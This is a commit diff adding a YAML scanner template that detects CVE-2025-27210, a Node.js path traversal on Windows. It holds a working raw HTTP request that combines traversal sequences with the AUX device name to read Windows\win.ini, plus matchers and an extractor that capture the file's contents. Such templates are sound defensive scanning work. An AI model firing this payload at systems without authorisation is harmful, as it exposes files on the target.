Added template for cve-2025-27210

cve-2025-27210.yaml

@@ -0,0 +1,36 @@
+id: cve-2025-27210
+info:
+  name: Node.js Windows Path Traversal
+  author: MuhammadWaseem
+  severity: high
+  description: |
+    This template detects a path traversal vulnerability in Node.js on
+    Windows systems (CVE-2025-27210) by exploiting reserved device file
+    names combined with traversal sequences.
+  tags: path-traversal,windows,nodejs,vulnerability
+
+variables:
+  traverse_sequence: "../..\\" # Windows-style path traversal
+  target_file: "Windows\\win.ini"
+
+http:
+  - raw:
+      - |
+        GET /{{traverse_sequence}}AUX\\..\\{{target_file}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - "(?i)\\[windows\\]" # Matches content indicating the win.ini file
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(?s)(\\[windows\\].*?)\\n\\n" # Extracts the content of the win.ini file
+        group: 1